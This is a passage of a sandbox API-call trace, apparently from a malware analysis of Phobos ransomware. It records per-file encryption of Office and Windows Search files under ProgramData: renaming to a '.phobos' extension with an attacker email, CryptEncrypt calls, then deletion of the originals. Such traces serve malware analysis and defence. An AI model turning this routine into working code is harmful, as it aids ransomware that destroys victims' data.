(lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\XLINTL32.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\xlintl32.dll.trx_dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0173.666] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=145760) returned 1 [0173.666] CloseHandle (hObject=0x17c) returned 1 [0173.666] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\XLINTL32.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\xlintl32.dll.trx_dll")) returned 0x2020 [0173.666] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\XLINTL32.DLL.trx_dll.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\xlintl32.dll.trx_dll.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0173.666] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\XLINTL32.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\xlintl32.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0173.666] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0173.667] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0173.667] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\XLINTL32.DLL.trx_dll.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\xlintl32.dll.trx_dll.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0173.667] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32ca8) returned 1 [0173.667] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0173.667] ReadFile (in: hFile=0x17c, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x23960, lpOverlapped=0x0) returned 1 [0173.785] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x23970, dwBufLen=0x23970 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x23970) returned 1 [0173.786] WriteFile (in: hFile=0x180, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x23970, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x23970, lpOverlapped=0x0) returned 1 [0173.788] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32d28) returned 1 [0173.788] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0173.788] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50, dwBufLen=0x50 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50) returned 1 [0173.788] CryptDestroyKey (hKey=0xa32d28) returned 1 [0173.788] WriteFile (in: hFile=0x180, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x102, lpOverlapped=0x0) returned 1 [0173.788] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0173.788] CloseHandle (hObject=0x17c) returned 1 [0173.788] CloseHandle (hObject=0x180) returned 1 [0173.788] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\XLINTL32.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\xlintl32.dll.trx_dll")) returned 1 [0173.791] SetEvent (hEvent=0xe8) returned 1 [0173.791] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0173.791] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\XLINTL32.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\xlintl32.rest.trx_dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0173.791] GetFileSizeEx (in: hFile=0x180, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=1206112) returned 1 [0173.791] CloseHandle (hObject=0x180) returned 1 [0173.791] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\XLINTL32.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\xlintl32.rest.trx_dll")) returned 0x2020 [0173.791] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\XLINTL32.REST.trx_dll.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\xlintl32.rest.trx_dll.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0173.791] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\XLINTL32.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\xlintl32.rest.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0173.791] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0173.791] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0173.791] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\XLINTL32.REST.trx_dll.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\xlintl32.rest.trx_dll.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0173.792] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32ca8) returned 1 [0173.792] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0173.792] ReadFile (in: hFile=0x180, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x110100, lpOverlapped=0x0) returned 1 [0174.096] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x110100, dwBufLen=0x110100 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x110100) returned 1 [0174.105] WriteFile (in: hFile=0x17c, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x110100, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x110100, lpOverlapped=0x0) returned 1 [0174.138] ReadFile (in: hFile=0x180, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x16660, lpOverlapped=0x0) returned 1 [0174.213] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x16670, dwBufLen=0x16670 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x16670) returned 1 [0174.214] WriteFile (in: hFile=0x17c, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x16670, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x16670, lpOverlapped=0x0) returned 1 [0174.224] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa327e8) returned 1 [0174.224] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0174.224] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50, dwBufLen=0x50 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50) returned 1 [0174.224] CryptDestroyKey (hKey=0xa327e8) returned 1 [0174.224] WriteFile (in: hFile=0x17c, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x102, lpOverlapped=0x0) returned 1 [0174.224] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0174.224] CloseHandle (hObject=0x180) returned 1 [0174.224] CloseHandle (hObject=0x17c) returned 1 [0174.224] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\XLINTL32.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\xlintl32.rest.trx_dll")) returned 1 [0174.226] SetEvent (hEvent=0xe8) returned 1 [0174.226] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0174.226] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\XLSLICER.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\xlslicer.dll.trx_dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0174.226] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=14688) returned 1 [0174.226] CloseHandle (hObject=0x17c) returned 1 [0174.226] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\XLSLICER.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\xlslicer.dll.trx_dll")) returned 0x2020 [0174.227] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\XLSLICER.DLL.trx_dll.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\xlslicer.dll.trx_dll.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0174.227] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\XLSLICER.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\xlslicer.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0174.227] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0174.227] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0174.227] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\XLSLICER.DLL.trx_dll.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\xlslicer.dll.trx_dll.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0174.228] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32ca8) returned 1 [0174.228] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0174.228] ReadFile (in: hFile=0x17c, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x3960, lpOverlapped=0x0) returned 1 [0174.376] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x3970, dwBufLen=0x3970 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x3970) returned 1 [0174.376] WriteFile (in: hFile=0x180, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x3970, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x3970, lpOverlapped=0x0) returned 1 [0174.377] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32d28) returned 1 [0174.377] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0174.377] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50, dwBufLen=0x50 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50) returned 1 [0174.377] CryptDestroyKey (hKey=0xa32d28) returned 1 [0174.377] WriteFile (in: hFile=0x180, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x102, lpOverlapped=0x0) returned 1 [0174.377] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0174.377] CloseHandle (hObject=0x17c) returned 1 [0174.377] CloseHandle (hObject=0x180) returned 1 [0174.377] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\XLSLICER.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\xlslicer.dll.trx_dll")) returned 1 [0174.378] SetEvent (hEvent=0xe8) returned 1 [0174.378] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0174.378] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\Windows\\GatherLogs\\SystemIndex\\SystemIndex.1.Crwl" (normalized: "c:\\programdata\\microsoft\\search\\data\\applications\\windows\\gatherlogs\\systemindex\\systemindex.1.crwl"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0174.379] GetFileSizeEx (in: hFile=0x180, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=314) returned 1 [0174.379] CloseHandle (hObject=0x180) returned 1 [0174.379] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\Windows\\GatherLogs\\SystemIndex\\SystemIndex.1.Crwl" (normalized: "c:\\programdata\\microsoft\\search\\data\\applications\\windows\\gatherlogs\\systemindex\\systemindex.1.crwl")) returned 0x2020 [0174.379] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\Windows\\GatherLogs\\SystemIndex\\SystemIndex.1.Crwl.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\search\\data\\applications\\windows\\gatherlogs\\systemindex\\systemindex.1.crwl.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0174.379] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\Windows\\GatherLogs\\SystemIndex\\SystemIndex.1.Crwl" (normalized: "c:\\programdata\\microsoft\\search\\data\\applications\\windows\\gatherlogs\\systemindex\\systemindex.1.crwl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0174.379] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0174.379] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0174.379] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\Windows\\GatherLogs\\SystemIndex\\SystemIndex.1.Crwl.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\search\\data\\applications\\windows\\gatherlogs\\systemindex\\systemindex.1.crwl.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0174.479] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32ce8) returned 1 [0174.479] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0174.479] ReadFile (in: hFile=0x180, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x13a, lpOverlapped=0x0) returned 1 [0174.480] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x140, dwBufLen=0x140 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x140) returned 1 [0174.480] WriteFile (in: hFile=0x130, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x140, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x140, lpOverlapped=0x0) returned 1 [0174.481] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32ca8) returned 1 [0174.481] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0174.481] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50, dwBufLen=0x50 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50) returned 1 [0174.481] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0174.481] WriteFile (in: hFile=0x130, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x102, lpOverlapped=0x0) returned 1 [0174.481] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0174.481] CloseHandle (hObject=0x180) returned 1 [0174.481] CloseHandle (hObject=0x130) returned 1 [0174.481] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\Windows\\GatherLogs\\SystemIndex\\SystemIndex.1.Crwl" (normalized: "c:\\programdata\\microsoft\\search\\data\\applications\\windows\\gatherlogs\\systemindex\\systemindex.1.crwl")) returned 1 [0174.482] SetEvent (hEvent=0xe8) returned 1 [0174.482] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0174.482] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\Windows\\MSS.chk" (normalized: "c:\\programdata\\microsoft\\search\\data\\applications\\windows\\mss.chk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0174.569] GetFileSizeEx (in: hFile=0x14c, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=8192) returned 1 [0174.569] CloseHandle (hObject=0x14c) returned 1 [0174.569] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\Windows\\MSS.chk" (normalized: "c:\\programdata\\microsoft\\search\\data\\applications\\windows\\mss.chk")) returned 0x2020 [0174.569] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\Windows\\MSS.chk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\search\\data\\applications\\windows\\mss.chk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0174.569] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\Windows\\MSS.chk" (normalized: "c:\\programdata\\microsoft\\search\\data\\applications\\windows\\mss.chk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0174.569] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0174.569] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0174.569] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\Windows\\MSS.chk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\search\\data\\applications\\windows\\mss.chk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0174.570] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32ca8) returned 1 [0174.570] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0174.570] ReadFile (in: hFile=0x14c, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x2000, lpOverlapped=0x0) returned 1 [0174.600] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x2010, dwBufLen=0x2010 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x2010) returned 1 [0174.600] WriteFile (in: hFile=0x17c, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x2010, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x2010, lpOverlapped=0x0) returned 1 [0174.601] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa327e8) returned 1 [0174.601] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0174.601] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x30, dwBufLen=0x30 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x30) returned 1 [0174.601] CryptDestroyKey (hKey=0xa327e8) returned 1 [0174.601] WriteFile (in: hFile=0x17c, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xe2, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xe2, lpOverlapped=0x0) returned 1 [0174.602] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0174.602] CloseHandle (hObject=0x14c) returned 1 [0174.602] CloseHandle (hObject=0x17c) returned 1 [0174.602] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\Windows\\MSS.chk" (normalized: "c:\\programdata\\microsoft\\search\\data\\applications\\windows\\mss.chk")) returned 1 [0174.603] SetEvent (hEvent=0xe8) returned 1 [0174.603] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0174.603] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\Windows\\MSSres00002.jrs" (normalized: "c:\\programdata\\microsoft\\search\\data\\applications\\windows\\mssres00002.jrs"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0174.605] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=1048576) returned 1 [0174.605] CloseHandle (hObject=0x17c) returned 1 [0174.605] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\Windows\\MSSres00002.jrs" (normalized: "c:\\programdata\\microsoft\\search\\data\\applications\\windows\\mssres00002.jrs")) returned 0x2020 [0174.605] GetFileAttributesW 